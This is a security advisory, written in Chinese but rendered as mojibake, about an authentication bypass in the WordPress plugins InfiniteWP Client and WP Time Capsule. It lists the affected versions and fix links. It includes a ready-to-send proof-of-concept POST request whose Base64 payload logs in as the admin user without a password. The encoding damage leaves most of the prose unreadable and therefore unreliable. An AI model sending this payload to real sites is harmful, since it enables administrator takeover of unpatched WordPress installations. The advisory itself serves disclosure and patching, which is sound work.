WordPress²å¼þInfiniteWP ClientºÍWP Time CapsuleÎó²îΣº¦Í¨¸æ
Ðû²¼Ê±¼ä 2020-01-16Îó²î±àºÅºÍ¼¶±ð
CVE±àºÅ£ºÔÝÎÞ£¬£¬£¬£¬£¬£¬Î£ÏÕ¼¶±ð£ºÑÏÖØ£¬£¬£¬£¬£¬£¬CVSS·ÖÖµ£º³§ÉÌ×ÔÆÀ£º9.8£¬£¬£¬£¬£¬£¬¹Ù·½Î´ÆÀ¶¨
Ó°Ïì°æ±¾
InfiniteWP Client < 1.9.4.5
WP Time Capsule < 1.21.16
Îó²î¸ÅÊö
WordPress²å¼þInfiniteWP ClientºÍWP Time CapsuleÖеÄÉí·ÝÑéÖ¤ÈÆ¹ýÎó²îʹµÃ32Íò¸öÍøÕ¾Ò×Êܹ¥»÷¡£¡£¡£¡£¡£ÕâÁ½¸ö²å¼þÓÃÓÚ×ÊÖúÓû§ÖÎÀíһ̨ЧÀÍÆ÷ÉϵĶà¸öWordPressÍøÕ¾£¬£¬£¬£¬£¬£¬²¢ÔÚÐû²¼¸üÐÂʱΪÎļþºÍÊý¾Ý¿âÌõÄ¿½¨×°±¸·Ý¡£¡£¡£¡£¡£
WebArxÇå¾²Ñо¿Ö°Ô±·¢Ã÷ËüÃǵĴúÂëÖб£´æÂß¼¹ýʧ£¬£¬£¬£¬£¬£¬Ê¹µÃ¹¥»÷Õß¿ÉÒÔÈÆ¹ýÃÜÂëÀ´µÇ¼ÖÎÀíÔ±ÕË»§¡£¡£¡£¡£¡£Æ¾Ö¤WordPress²å¼þ¿â£¬£¬£¬£¬£¬£¬InfiniteWP Client±»×°ÖÃÔÚ30¶àÍò¸öÍøÕ¾ÉÏ£»£»£»£»£»£»¶øWP Time CapsuleµÄ×°ÖÃÁ¿ÖÁÉÙΪ2Íò¡£¡£¡£¡£¡£
Ñо¿Ö°Ô±·¢Ã÷ÔÚµÍÓÚ°æ±¾1.9.4.5µÄInfiniteWP ClientÖУ¬£¬£¬£¬£¬£¬¹¥»÷Õß¿ÉÒÔʹÓôøÓÐJSONºÍBase64±àÂëµÄpayloadµÄPOSTÇëÇóÀ´ÈƹýÃÜÂ룬£¬£¬£¬£¬£¬Í¨¹ý½öÖªµÀÖÎÀíÔ±Óû§ÃûÀ´µÇ¼¡£¡£¡£¡£¡£¶øÔÚµÍÓÚ1.21.16µÄWP Time Capsule°æ±¾ÖУ¬£¬£¬£¬£¬£¬¹¥»÷Õß¿Éͨ¹ýÔÚÔʼPOSTÇëÇóÖÐÌí¼Ó¶ñÒâ×Ö·û´®À´Å²Óú¯Êý²¶»ñ¿ÉÓõÄÖÎÀíÔ±ÕË»§ÁÐ±í²¢ÒÔµÚÒ»¸öÖÎÀíÔ±Éí·ÝµÇ¼¡£¡£¡£¡£¡£
Îó²îÑéÖ¤
²å¼þInfiniteWP ClientµÄPOC£ºhttps://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/¡£¡£¡£¡£¡£
Ê×ÏÈÐèҪʹÓÃJSON±àÂëµÄ¸ºÔØ£¬£¬£¬£¬£¬£¬È»ºóÊÇBase64¡£¡£¡£¡£¡£½ÓÏÂÀ´£¬£¬£¬£¬£¬£¬Ëü½«ÔÚPOSTÇëÇóÖÐÔʼ·¢Ë͵½Ä¿µÄÕ¾µã¡£¡£¡£¡£¡£
POST / HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/plain
Content-Length: 93
_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
ÐÞ¸´½¨Òé
ÏÖÔÚÕâÁ½¸ö²å¼þ¶¼ÒÑÐû²¼¸üÐÂÐÞ¸´Á˸ÃÎÊÌ⣺
https://wordpress.org/plugins/iwp-client/
https://wordpress.org/plugins/wp-time-capsule/
²Î¿¼Á´½Ó
https://threatpost.com/wordpress-bug-leaves-sites-open-to-attack/151911/